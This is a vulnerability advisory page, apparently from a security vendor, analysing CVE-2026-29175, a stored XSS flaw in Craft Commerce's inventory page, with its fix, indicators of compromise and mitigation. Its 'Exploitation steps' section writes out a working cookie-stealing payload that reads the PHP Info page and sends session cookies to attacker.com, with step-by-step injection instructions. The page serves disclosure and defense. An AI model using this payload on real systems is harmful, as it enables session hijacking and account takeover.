CVE-2026-29175: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-29175 is a stored cross-site scripting (XSS) vulnerability in Craft Commerce's inventory management page that enables session hijacking. Discovered and disclosed on March 9, 2026, it affects Craft Commerce versions 5.0.0 through 5.5.2 (inclusive), with version 5.5.3 containing the fix. The Product Title, Variant Title, and Variant SKU fields are rendered without proper HTML escaping, allowing an authenticated attacker to inject arbitrary JavaScript that executes in any user's browser upon viewing the inventory page. It carries a CVSS v3.1 score of 5.4 (Medium) and a CVSS v4.0 score of 8.6 (High) (Github Advisory, Craft CMS Advisory).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically in src/controllers/InventoryController.php where the actionInventoryLevelsTableData() method passed user-supplied product and variant field values directly to Cp::chipHtml() and Html::tag() without first encoding them via Html::encode(). The fix (commit 9f0638a) adds explicit Html::encode() calls around $purchasable->getDescription(), $inventoryLevel['description'], and $inventoryLevel['sku'] before rendering. Exploitation requires low-level authenticated access (control panel access with product create/edit permissions), and the payload persists in the database, executing automatically whenever any user — including administrators — navigates to /admin/commerce/inventory (Craft CMS Advisory, Fix Commit).

Impact

Successful exploitation allows an attacker to steal session cookies from any user who views the Commerce Inventory page, including administrators, enabling full session hijacking without requiring additional user interaction or elevated session approval. The attack leverages the PHP Info utility page (/admin/utilities/php-info), which exposes unmasked session cookie values in HTTP_COOKIE and $_SERVER['HTTP_COOKIE'] parameters. Beyond session hijacking, the advisory notes the vulnerability can be chained to achieve full database exfiltration or perform arbitrary administrative actions after compromising an administrator session (Craft CMS Advisory).

Exploitability

A detailed proof-of-concept exploit with step-by-step reproduction instructions and a concrete malicious payload targeting the /admin/commerce/inventory endpoint is publicly available in the GitHub security advisory (Craft CMS Advisory). The EPSS score is approximately 0.014% (3rd percentile), indicating a low current probability of widespread exploitation. There is no evidence of active in-the-wild exploitation at this time, no known threat actor attribution, and the vulnerability is not listed in the CISA KEV catalog (Github Advisory).

Exploitation steps

  1. Gain access: Obtain or compromise a Craft CMS control panel account with permissions to access Craft Commerce and create/edit products.
  2. Craft the payload: Prepare a malicious JavaScript payload embedded in an HTML tag, such as <img src=x onerror="fetch('/admin/utilities/php-info').then(r=>r.text()).then(d=>{let m=d.match(/HTTP_COOKIE.*?<td>(.*?)<\/td>/s);fetch('https://attacker.com/?c='+encodeURIComponent(m?m[1]:''))})">.
  3. Inject the payload: Navigate to Commerce → Products, create or edit a product, and set the Product Title (or Variant Title or Variant SKU) field to the crafted payload, then save the product.
  4. Wait for victim: When any user (including an administrator) navigates to Commerce → Inventory (/admin/commerce/inventory), the stored XSS payload executes automatically in their browser.
  5. Extract session cookies: The payload fetches /admin/utilities/php-info, parses the unmasked session cookie values from the HTTP_COOKIE or $_SERVER['HTTP_COOKIE'] fields, and exfiltrates them to the attacker-controlled server.
  6. Hijack session: Use the captured session cookie to authenticate as the victim user, gaining full access to their Craft CMS session and any associated administrative privileges (Craft CMS Advisory).

Indicators of compromise

  • Network: Outbound HTTP requests from the Craft CMS server or admin users' browsers to unexpected external domains (e.g., attacker.com) containing URL-encoded cookie data; unusual fetch requests to /admin/utilities/php-info originating from client-side JavaScript.
  • Logs: Web server access logs showing requests to /admin/utilities/php-info from browser sessions that do not correspond to normal administrative activity; access log entries for /admin/commerce/inventory followed immediately by outbound requests to unknown external hosts.
  • File System / Database: Product, variant, or SKU records in the Craft Commerce database containing HTML tags or JavaScript event handlers (e.g., <img, onerror=, <script) in the Title or SKU fields.
  • Process/Application: Craft CMS application logs recording unusual product saves with abnormally long or HTML-containing title/SKU values by low-privilege users (Craft CMS Advisory).

Mitigation and workarounds

Upgrade Craft Commerce to version 5.5.3 or later, which applies proper Html::encode() escaping to the Product Title, Variant Title, and Variant SKU fields in the inventory controller (commit 9f0638a) (Fix Commit). As a secondary mitigation, restrict access to the Commerce inventory management pages to only trusted, authorized personnel, and consider disabling or restricting access to the PHP Info utility page (/admin/utilities/php-info) to limit cookie exposure. Until patching is possible, monitor for suspicious product/variant records containing HTML or JavaScript in title and SKU fields (Craft CMS Advisory).

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management